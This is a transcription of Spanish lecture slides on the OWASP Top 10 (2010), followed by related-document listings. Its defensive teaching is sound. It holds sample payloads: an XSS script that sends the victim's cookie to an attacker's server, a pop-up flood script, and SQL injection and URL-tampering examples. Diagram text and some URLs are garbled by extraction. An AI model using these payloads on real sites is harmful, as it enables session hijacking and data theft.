Open Web Application Security Project (OWASP) Que es un ataque?

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Open Web Application Security Project (OWASP) Que es un ataque?"

Transcripción

1 Open Web Application Security Project (OWASP) Roberto Gómez Lámina 1. Que es un ataque? Acción o acciones que tienen por objetivo el que cualquier parte de un sistema de información automatizado, deje de funcionar de acuerdo con su propósito definido. Esto incluye cualquier acción que causa la destrucción, modificación o retraso del servicio no autorizado. Lámina 2. OWASP 1

2 Aclaración ataque No es un ataque físico (aunque puede ser). Un ataque no se realiza en un solo paso. Depende de los objetivos del atacante. Puede consistir de varios pasos antes de llegar a su objetivo. Lámina 3. Mecanismos de seguridad Firewalls IDS (Sistemas de Detección de Intrusos) Filtrado de información Lámina 4. OWASP 2

3 Sin embargo Empresas necesitan dar servicios al exterior. Existe un puerto que siempre esta abierto Lámina 5. OWASP Open Web Application Security Project Grupo de voluntarios Produce documentación, herramientas y estándares gratuitos Calidad profesional y de código abierto Página Lámina 6. OWASP 3

4 Qué es Seguridad de Aplicaciones Web? No es seguridad en redes Asegurar el código regularmente usado en una aplicación web, Asegurar librerías. Asegurar sistemas de backend. Asegurar aplicaciones y servidores web. Seguridad en redes ignora el contenido del tráfico HTTP. Firewalls, SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening Lámina 7. Seguridad en red vs seguridad en web Network Lay yer Application Layer APPLICATION ATTACK Firewall Your security perimeter has huge holes at the application layer Custom Developed Application Code App Server Web Server Hardened dos Firewall Databas ses Legacy Sys stems Web Serv vices Director ries Human Re esrcs Billing You can t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks Lámina 8. OWASP 4

5 OWASP Top Ten Las 10 vulnerabilidades principales que están usando los atacantes contra páginas Web Similar al Top 20 de SANS / FBI pero para aplicaciones Web Un buen estándar mínimo para exigir a las áreas de desarrollo La mayoría de los problemas anteriores caen en alguna de estas categorías generales Lámina 9. Las dos primeras versiones Unvalidated Input 1. Cross Site Scripting (XSS) 2. Broken Access Control 2. Injection Flaws 3. Broken Authentication and 3. Malicious File Execution Session Management 4. Insecure Direct Object 4. Cross Site Scripting Reference 5. Buffer Overflow 5. Cross Site Request Forgery (CSRF) 6. Injection Flaws 7. Improper Error Handling 8. Insecure Storage 9. Application Denial of Service 10. Insecure Configuration Management 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access Lámina 10. OWASP 5

6 La versión 2010 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards Lámina 11. Qué cambio? Se trata de riesgos, no solo vulnerabilidades Nuevo título: The Top 10 Most Critical Web Application Security Risks Metodología Basada en OWASP Risk Rating Methodology. Dos riesgos añadidos, dos eliminados Se añadio A6-Mala Configuración Seguridad Era A10 en el 2004: : Insecure Configuration Management Se añadio ñdi A10: Direccionamientos i i inválidos Relativamente comun y muy peligrosa falla que no es muy conocida. Se eliminó A3- Malicious File Execution Más que nada una falla en PHP que esta en decadencia Se eliminó A6 - Information Leakage and Improper Error Handling Una falla existente, pero que normalmente no representa mucho riesgo. Lámina 12. OWASP 6

7 Mapeo 2007 a 2010 OWASP Top (Previous) A2 Injection Flaws A1 Cross Site Scripting (XSS) A1 Injection OWASP Top (New) A2 Cross Site Scripting (XSS) A7 Broken Authentication and Session Management A4 Insecure Direct Object Reference A5 Cross Site Request Forgery (CSRF) <was T A10 Insecure Configuration Management> A8 Insecure Cryptographic Storage = = + A3 Broken Authentication and Session Management A4 Insecure Direct Object References A5 Cross Site Request Forgery (CSRF) A6 Security Misconfiguration (NEW) A7 Insecure Cryptographic Storage A10 Failure to Restrict URL Access A8 Failure to Restrict URL Access A9 Insecure Communications <not in T > A9 Insufficient Transport Layer Protection A10 Unvalidated Redirects and Forwards (NEW) A3 Malicious File Execution <dropped from T > A6 Information Leakage and Improper Error Handling <dropped from T > = Lámina 13. Metodología OWASP Top 10 Threat Agent? Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Widespreadd Easy Severe Average Common Average Moderate Difficult Uncommon Difficult Minor Business Impact? Injection Example 1.66 * weighted risk rating Lámina 14. OWASP 7

8 OWASP Top Ten (Edición 2010) Lámina Inyección Inyección implica Engañar a una aplicación incluyendo comandos en los datos enviados id a un interprete. Interpretes Toman los strings y los interpretan como comandos. SQL, Shell SO, LDAP, Xpath, Hibernate, etc. Inyección SQL aún es muy común. Muchas aplicaciones aún son susceptibles (no se sabe por qué). Aun cuando es usualmente simple de evitar. Impacto Usualmente severo. La base de datos entera puede ser leída o modificada. Posible contar con el esquema total de la base de datos, o contar con acceso a cuentas o a nivel S.O. Lámina 16. OWASP 8

9 s Desarrollo de Aplicaciones Distribuidas Ejemplo Inyección SQL ayer Application La HTTP request APPLICATION ATTACK Account Finance ts e ation ons Administra Transactio App Server ation Mgmt rce ions HTTP SQL response query Communica Knowledge M Custom Code Web Server E-Commer Bus. Functi Database tems Legacy Syst ces Web Servic es Directorie srcs Human Res DB Table Billing "SELECT * FROM Account Summary Account: accounts WHERE acct= Acct: SKU: OR = Acct: " Acct: Acct: Application presents a form to the attacker 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query Network Layer Firewall Hardened OS Firewall 4. Database runs query containing attack and sends encrypted results back to application 5. Application decrypts data as normal and sends results to the user Lámina Cross-Site Scripting (XSS) Ocurre en cualquier tiempo Datos en bruto es enviado por el atacante al browser de un usuario. Datos en bruto Almacenado en la base de datos Reflejado de la entrada web Enviado directamente a los scripts del cliente. Virtualmente cada aplicación web tiene este problema Intentar en el browser: javascript:alert(documento.cookie). Impacto típico Robar la sesión del usuario, robo de datos sensibles, rescribir la página web, redirigir usuario a un sitio de phishing o malware. Lámina 18. OWASP 9

10 Ataque XSS El problema reside en la administración de archivos adjuntos de tipo.html o.htm Manejar la salida de una aplicación web es lo mismo que pasar datos a los subsistemas el subsistema final al que se le pasa datos es el browser del visitante y el parser HTML en el browser solo es otro sistema cuando se envían datos a él se debe poner atención a los metacaracteres Problema notificado por CERT en el Lámina 19. Empecemos por lo sencillo Aplicación web: guest book permite visitantes introducir lo que dessen y solo añaden el nuevo texto a lo que estaba antes Usuario malicioso introduce lo siguiente: <!-- Nada pasa al principio, pero se mezcla con lo que se escribió y lo que se escribirá, aplicación web pasará lo siguiente a lectores libro de visitas: : Cool web page, dude! <!-- You re da man, boss : Lámina 20. OWASP 10

11 Otros dos ejemplos Posible introducir: <script> for (q=0; q < 1000; q++) window.open(http://www.hotsex.example); </script> Otro ejemplo un sitio de discusión para niños el sitio carece de filtrado hacia afuera, y alguien introduce lo siguiente: <imag src = Lámina 21. Ejemplo XSS 1 2 Attacker sets the trap update my profile Attacker enters a malicious script into a web page that stores the data on the server Victim views page sees attacker profile Application with stored XSS vulnerability Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Script runs inside victim s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim s session cookie Lámina 22. OWASP 11

12 Algo de código JavaScript proporciona cookie al web server del atacante <script> document.location.replace( + =?what= + document.cookie) </script> Enviando el browser al sitio original <script> if (document.cookie.indexof( stolen ) < 0 { document.cookie = stolen=true ; document.location.replace( + =?what= + document.cookie + = &whatnext=http://www.somesite.example/ ) } </script> Lámina 23. Otros ataques XSS Modificación texto posible cambiar información mientras la página es desplegada XSS con ingeniería social script malicioso no es almacenado en el servidor atacante engaña a la víctima, para que este se dirija a un URL con el scripto malicioso Robo de passwords algunos sitios vuelven a desplear el user-name si la autenticación falla, considerando que el password fue mal tecleado Lámina 24. OWASP 12

13 Ejemplo de ingeniería social Lámina 25. Esquemas a evitar en ambientes HTML #1: ( &, <, >, " ) &entity; ( ', / ) &#xhh; ESAPI: encodeforhtml() HTML Element Content (e.g., <div> some text to display </div> ) HTML Attribute Values (e.g., <input name='person' type='text' value='defaultvalue'> ) JavaScript Data (e.g., <script> some javascript </script> ) HTML Style Property Values (e.g.,.pdiv a:hover {color: red; text-decoration: underline} ) URI Attribute Values (e.g., <a href="javascript:toggle('lesson')" ) #2: All non-alphanumeric < 256 &#xhh ESAPI: encodeforhtmlattribute() #3: All non-alphanumeric < 256 \xhh ESAPI: encodeforjavascript() #4: All non-alphanumeric < 256 \HH ESAPI: encodeforcss() #5: All non-alphanumeric < 256 %HH ESAPI: encodeforurl() ALL other contexts CANNOT include Untrusted Data Recommendation: Only allow #1 and #2 and disallow all others See: for more details Lámina 26. OWASP 13

14 3. Autenticación rota y manejo de sesiones HTTP es un protocolo stateless Se deben presentar credenciales en cada petición Debe usar SSL para cualquier tipo de autenticación. Manejo de las fallas en la sesión SESSION ID usado para seguimiento del estado. SESSION ID es visible en la red, en browsers, logs, etc. Cuidado con los side-doors Cambiar contraseña, recordar contraseña, olvide mi contraseña, pregunta secreta, dirección correo, etc. Impacto Cuentas usuarios comprometidas o sesiones de usuarios secuestradas. Lámina 27. Ejemplo com?jsessionid=9fa1db9ea... 1 User sends credentials Site uses URL rewriting (i.e., put session in URL) 2 Accounts Finance Adm ministration Tr ransactions mmunication Knowledge Mgmt Commerce s. Functions Com K Custom Code E- Bus 3 User clicks on a link to hacker com in a forum 5 Hacker uses JSESSIONID and takes over victim s account Hacker checks referer logs on and finds user s JSESSIONID Lámina OWASP 14

15 4. Dirección insegura de referencias de objetos Cómo protege el acceso a sus datos? Es parte de reforzar Autorización, junto con el número 8: Restricción Acceso al URL Error común Solo listar los objetos autorizados para el usuario correcto o, Esconder los objetos referenciados en campos ocultaos.. Y entonces no aplicar estas restricciones en el lado del servidor. Esto se conoce como control de acceso a nivel presentación y no funciona. Atacante simple y sencillamente tampers con el valor del parámetro. Impacto Atacante puede acceder a datos o archivos no autorizados. Lámina 29. Ejemplo Attacker notices his acct https://www.onlinebank.com/user?acct=6065 parameter is 6065?acct=6065 He modifies it to a nearby number?acct=6066 Attacker views the victim s account information Lámina 30. OWASP 15

16 5. Cross Site Request Forgery (CSRF) CSRF Un ataque donde el browser de la víctima es engañado usando un comando hacia una aplicación web vulnerable. Vulnerabilidad provocada por que los browsers automáticamente incluyen datos de autenticación de los usuarios en cada petición. Imaginar Y si un usuario puede dirigir el ratón de un usurario y hacer click en ligas que se encuentran en una aplicación bancaria. Qué daño podrían provocar? Impacto Iniciar transacciones. Acceso a datos sensibles Cambiar datos cuentas. Lámina 31. Ejemplo 1 Attacker sets the trap on some website on the internet (or simply via an ) 2 Hidden <img> tag contains attack against vulnerable site While logged into vulnerable site, victim views attacker site Application with CSRF vulnerability Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code <img> tag loaded by browser sends GET request (including credentials) to vulnerable site Lámina Vulnerable site sees legitimate request from victim and performs the action requested OWASP 16

17 6. Mala configuración de seguridad Aplicaciones Web reposan sobre otro código. Todo desde el S.O. hasta el servidor Web No olvidar las librerías que se están usando. Es el código usado un secreto? Pensar en todos los lugares donde el código desarrollado se mueve. Seguridad no requiere código fuente secreto. CM se debe extender a todas las partes de la aplicación Todas las credenciales deben cambiar en producción. Impacto Instalar backdoor a través de parches no instalados del SO o servidor. Acceso no autorizado a cuentas por default. Lámina 33. Ejemplo ounts ance Acco Fina istration actions Admini Trans unication dge Mgmt mmerce unctions Commu Knowled E-Com Bus. Fu Database Custom Code App Configuration Insider Framework App Server Web Server Hardened OS Development QA Servers Test Servers Source Control Lámina 34. OWASP 17

18 7. Almacenamiento criptográfico inseguro Almacenando datos sensibles de forma insegura. Falla para identificar datos sensbibles. Falla para identificar todos los lugares donde estos datos son almacenados. Falla de proteger los datos en cada lugar. Impacto. Atacante accede o modifica información privada y/o confidencial. Atacante extrae secretos para usar en ataques posteriores. Mala reputación empresa, insatisfacción de los clientes, y la pérdida de confianza Gastos en la limpieza del incidente, tales como forencia, envío de cartas de disculpa, reponer tarjetas de crédito, proporcionar seguro contra robo de identidad. El negocio es demandado o terminado. Lámina 35. Ejemplo Victim enters credit 1 card number in form Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code 4 Malicious insider steals 4 million credit card numbers Log files Error handler logs CC details because merchant gateway is unavailable 2 Logs are accessible to all members of IT staff for debugging purposes 3 Lámina 36. OWASP 18

19 8. Falla en restringir el acceso al URL Cómo se protege el acceso al URL (páginas)? Esto es parte de reforzar la autenticación (punto 4). Error común Desplegar solo ligas autorizadas y opciones de menú. Esto se conoce como control de acceso a nivel presentación y no funciona. Atacante forza acceso directo a paginas no autorizadas. Impacto Atacante invoca funciones y servicios para los que no esta autorizado. Acceso a otras cuentas de usuarios y datos. Lleva a cabo acciones privilegiadas. Lámina 37. Ejemplo https://www.onlinebank.com/user/getaccounts Attacker notices the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts/ t Attacker views more accounts than just their own Lámina 38. OWASP 19

20 9. Insuficiente protección a nivel capa de transporte. Transmisión de datos de forma sensible. Falla en identificar los datos sensibles. Falla en identificar todos los lugares a los cuales los datos son enviados. Falla en proteger de forma apropiada estos datos en cada lugar. Impacto Atacante accede o modifica información privilegiada o privada. Tarjetas de crédito, registros hospitalarias, datos financieros (de la organización ió o de sus clientes) Atacante extrae secretos a usar en otros ataques. Mala reputación empresa, insatisfacción de los clientes, y la pérdida de confianza Gastos en la limpieza del incidente. El negocio es demandado o terminado Lámina 39. Ejemplo External Victim Custom Code Backend Systems Business Partners External attacker steals credentials and data off network External Attacker 1 2 Employees Internal attacker steals credentials and data from internal network Internal Attacker Lámina 40. OWASP 20

21 10. Redireccionamientos inválidos Redireccionamientos en una página web es algo común. Frecuentemente se incluyen parámetros proporcionados por el usuario en el URL destino. Si no son validados, el atacante puede enviar a la víctima al sitio de su preferencia. Forwards (aka Transfer en.net) también son comunes. Internamente envían la petición a una nueva página en la misma aplicación. Algunas veces los parámetros define la página. Si no son validados, el atacante puede ser capaz de usar forwards no validados para bypasear las verificaciones de autenticación y autorización. Impacto Redireccionar a la víctima a sitios de phishing o malware. Permite uso de funciones no autorizadas o acceso a datos. Lámina 41. Ejemplo Redirect 1 Attacker sends attack to victim via or webpage From: Internal Revenue Service Subject: Your Unclaimed dtax Refund Our records show you have an unclaimed federal tax refund. Please click here to initiate your claim. 3 Application redirects victim to attacker s site 2 Victim clicks link containing unvalidated parameter Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom stomcode Request sent to vulnerable site, including attacker s destination site as parameter. Redirect sends victim to attacker site Evil Site & &dest=www.evilsite.com Lámina Evil site installs malware on victim, or phish s for private information OWASP 21

22 Ejemplo Forward 1 Attacker sends attack to vulnerable page they have access to Request sent to vulnerable page which user does have access to. Redirect sends user directly to private page, bypassing access control. public void sensitivemethod( HttpServletRequest request, HttpServletResponse response) { try { // Do sensitive stuff here.... } catch (... 2 Application authorizes request, which continues Filter to vulnerable page 3 Forwarding gpage fails to validate parameter, sending attacker to unauthorized page, bypassing access control public void dopost( HttpServletRequest request, HttpServletResponse response) { try { String target = request.getparameter( "dest" ) );... request.getrequestdispatcher( target ).forward(request, response); } catch (... Lámina 43. Y que hacemos? Desarrollar código seguro Seguir las mejores prácticas de la guía del OWASP: Guide to Building Secure Web Applications Usar el estándar de verificación de seguridad en aplicaciones del OWASP, como una guía para saber que necesita una aplicación para ser segura. Usar componentes de seguridad que se acoplen a la organización. Utilizar OWASP s ESAPI como la base de los componentes estándares. /i h /ESAPI Revisar sus aplicaciones Que un equipo experto revise sus aplicaciones. Revise sus aplicaciones internamente siguiendo las guías OWASP OWASP Code Review Guide: OWASP Testing Guide: Lámina 44. OWASP 22

23 OWASP (ESAPI) Referencia: Lámina 45. Conclusiones No basta con una defensa perimetral Es importante saber que esta viendo la gente de afuera Nuestros desarrolladores todo es para ayer solo se preocupan porque funcione Un buen par de guías/referencias Writing Secure Code, Second Edition, Michael Howard, David LeBlanc Building Secure Software: How to Avoid Security Problems the Right Way -- by John Viega, Gary McGraw; OWASP Open Web Application Security Project Lámina 46. OWASP 23

24 Open Web Application Security Project (OWASP) Roberto Gómez Lámina 47. OWASP 24

The OWASP Foundation http://www.owasp.org

The OWASP Foundation http://www.owasp.org Los 10 riesgos más críticos que deben afrontar las organizaciones sobre sus aplicaciones: Top 10 Cádiz, 24 febrero 2011 Vicente Aguilera Díaz Spain Chapter Leader vicente.aguilera@owasp.org Copyright The

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Seguridad en Home Banking. Tendencias de la Tecnología en Seguridad Informática Argentina 2010

Seguridad en Home Banking. Tendencias de la Tecnología en Seguridad Informática Argentina 2010 Seguridad en Home Banking Tendencias de la Tecnología en Seguridad Informática Argentina 2010 1 Agenda 1. Proyecto Home Banking 2. Confección de equipos de trabajo 3. Arquitectura integral de seguridad

Más detalles

Seguridad en Sistemas Informáticos (SSI) Programación Segura

Seguridad en Sistemas Informáticos (SSI) Programación Segura 1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP

Más detalles

OWASP Top 10 2010 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation http://www.owasp.org/

OWASP Top 10 2010 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation http://www.owasp.org/ OWASP Top 10 2010 Los diez riesgos más importantes en aplicaciones web Fabio Cerullo Comité Global de Educación OWASP fcerullo@owasp.org Copyright The OWASP Foundation Permission is granted to copy, distribute

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

Testing de Seguridad de Aplicaciones Web

Testing de Seguridad de Aplicaciones Web Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. jardita@cybsec.com 16 de Noviembre de 2013 Coatzacoalcos - MEXICO Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa

Más detalles

About Me. Mario Robles Tencio

About Me. Mario Robles Tencio About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Curso: (30227) Seguridad Informática

Curso: (30227) Seguridad Informática Curso: (30227) Seguridad Informática Fernando Tricas García Departamento de Informática e Ingeniería de Sistemas Universidad de Zaragoza http://webdiis.unizar.es/~ftricas/ http://moodle.unizar.es/ ftricas@unizar.es

Más detalles

Offensive State Auditoría de Aplicaciones Web

Offensive State Auditoría de Aplicaciones Web Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4

Más detalles

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es

Más detalles

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos

Más detalles

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE 1 Obje%vo El asistente aprenderá los conceptos básicos sobre los

Más detalles

Penetration Testing. Conceptos generales y situación actual. PwC

Penetration Testing. Conceptos generales y situación actual. PwC Penetration Testing Conceptos generales y situación actual A/S Rodrigo Guirado, CISA, CGEIT Senior Manager Advisory Services rodrigo.guirado@uy.pwc.com PwC Agenda / Contenido Motivación Definiciones Generales

Más detalles

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

OWASP Testing Guide. John Vargas Open-Sec Senior Security Consultant OWASP Perú Chapter Leader John.Vargas@owasp.org @John_Vargas / @OWASP_Peru

OWASP Testing Guide. John Vargas Open-Sec Senior Security Consultant OWASP Perú Chapter Leader John.Vargas@owasp.org @John_Vargas / @OWASP_Peru OWASP Testing Guide John Vargas Open-Sec Senior Security Consultant OWASP Perú Chapter Leader John.Vargas@owasp.org @John_Vargas / @OWASP_Peru The OWASP Foundation http://www.owasp.org Derechos de Autor

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

OWASP Day Costa Rica

OWASP Day Costa Rica OWASP Day Costa Rica En contra de la delincuencia Cibernética Michael Hidalgo michael.hidalgo@owasp.org Chapter Leader OWASP Costa Rica Colaborador OWASP O2 Platform Project Acerca de Mi Software Developer

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Servicio de Protección Total Web

Servicio de Protección Total Web Servicio de Protección Total Web Prevención de Fraude Inspecciones de Procesos, Tecnología, Personas y Lugares, Ethical hacking, Concientización y Capacitación en Seguridad Detección de Fraude Ambientes

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

Ecyware GreenBlue Inspector

Ecyware GreenBlue Inspector Ecyware GreenBlue Inspector Guía de usuario Versión 1.0 Copyright Ecyware Solutions. All rights reserved, Ecyware 2003-2004. Tabla de contenido TABLA DE CONTENIDO 2 INTRODUCCIÓN 4 CARACTERÍSTICAS 5 ECYWARE

Más detalles

OWASP: Un punto de vista. aplicaciones web seguras

OWASP: Un punto de vista. aplicaciones web seguras OWASP: Un punto de vista pragmático para el desarrollo de aplicaciones web seguras Armando Carvajal (armando.carvajal@globalteksecurity.com) Gerente Arquitecto Soluciones Globaltek Security Master en seguridad

Más detalles

Aplicaciones Web (Curso 2015/2016)

Aplicaciones Web (Curso 2015/2016) Seguridad en Aplicaciones Web Aplicaciones Web (Curso 2015/2016) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.

Más detalles

Técnicas y Procedimientos para la realización de Test de Intrusión

Técnicas y Procedimientos para la realización de Test de Intrusión Extrelan 2008 Cáceres. Marzo de 2008 Técnicas y Procedimientos para la realización de Test de Intrusión SG6 Soluciones Globales en Seguridad de la Información http://www.sg6.es INDICE DE CONTENIDOS Primera

Más detalles

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com Principales vulnerabilidades en aplicaciones Web Christian Martorella Edge-security.com 1 #Whoami: Christian Martorella Cofundador Edge-security.com CISSP, CISM, CISA, OPST, OPSA Actualmente trabajando

Más detalles

